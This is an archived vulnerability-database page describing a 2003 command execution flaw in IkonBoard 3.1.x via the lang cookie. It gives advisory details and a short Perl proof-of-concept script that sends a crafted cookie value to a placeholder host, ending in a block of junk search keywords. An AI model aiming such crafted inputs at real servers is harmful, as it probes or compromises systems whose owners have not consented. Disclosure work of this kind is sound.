exploits , vulnerabilities , articles , IkonBoard Lang Cookie Arbitrary Command Execution Vulnerability

Title	IkonBoard Lang Cookie Arbitrary Command Execution Vulnerability
Published	2003-04-15-12:00AM
Updated	2003-09-17-04:05PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this vulnerability has been credited to Nick Cleaton <nick@cleaton.net>.
Vulnerable	Ikonboard.com ikonboard 3.1.2 a Ikonboard.com ikonboard 3.1.1
Not Vulnerable
Code	September 8th, 2003: Nick Cleaton has announced that a working exploit will be released in the following week. The following proof of concept was supplied that will cause a syntax error to be displayed on vulnerable systems. #!/usr/bin/perl -w use strict; my $HOST = 'www.example.com'; my $PORT = 80; my $PATH = '/cgi-bin/ikonboard.cgi'; use IO::Socket; my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!"; $sock->print( "GET $PATH HTTP/1.1 ", "Host: $HOST ", "Cookie: lang=%2E%00%22 ", "Connection: close ", " " ) or die "write: $!"; print while <$sock>; September 10th, 2003: Exploit code provided by snooq <http://www.angelfire.com/linux/snooq/>. /data/vulnerabilities/exploits/ikon.pl /data/vulnerabilities/exploits/IkonBoardExploit.pl
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 18:55:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
wamen larg anialsex Power Boar Kosmos Www.Fling. www.worl.s telugu ved news for C C99 gzchinared Flash kapersky f MyClassifi mysql 4.1 shakila se telugu boo www.blog20 www.ttmz.o maxcpm.inf Free sampl 200 /compo msn chekre netgear dg iransex woman wit bam marger workgroup WWW.IND.CO www.wapsex oklloger t680t www World /search/ex MysQL Lavalife.c Free downl slocate free sex porn powered b Desi ip board 2 mpn ibheb 200 /compo administra Mama dan a www.hgjxjg billion burning bl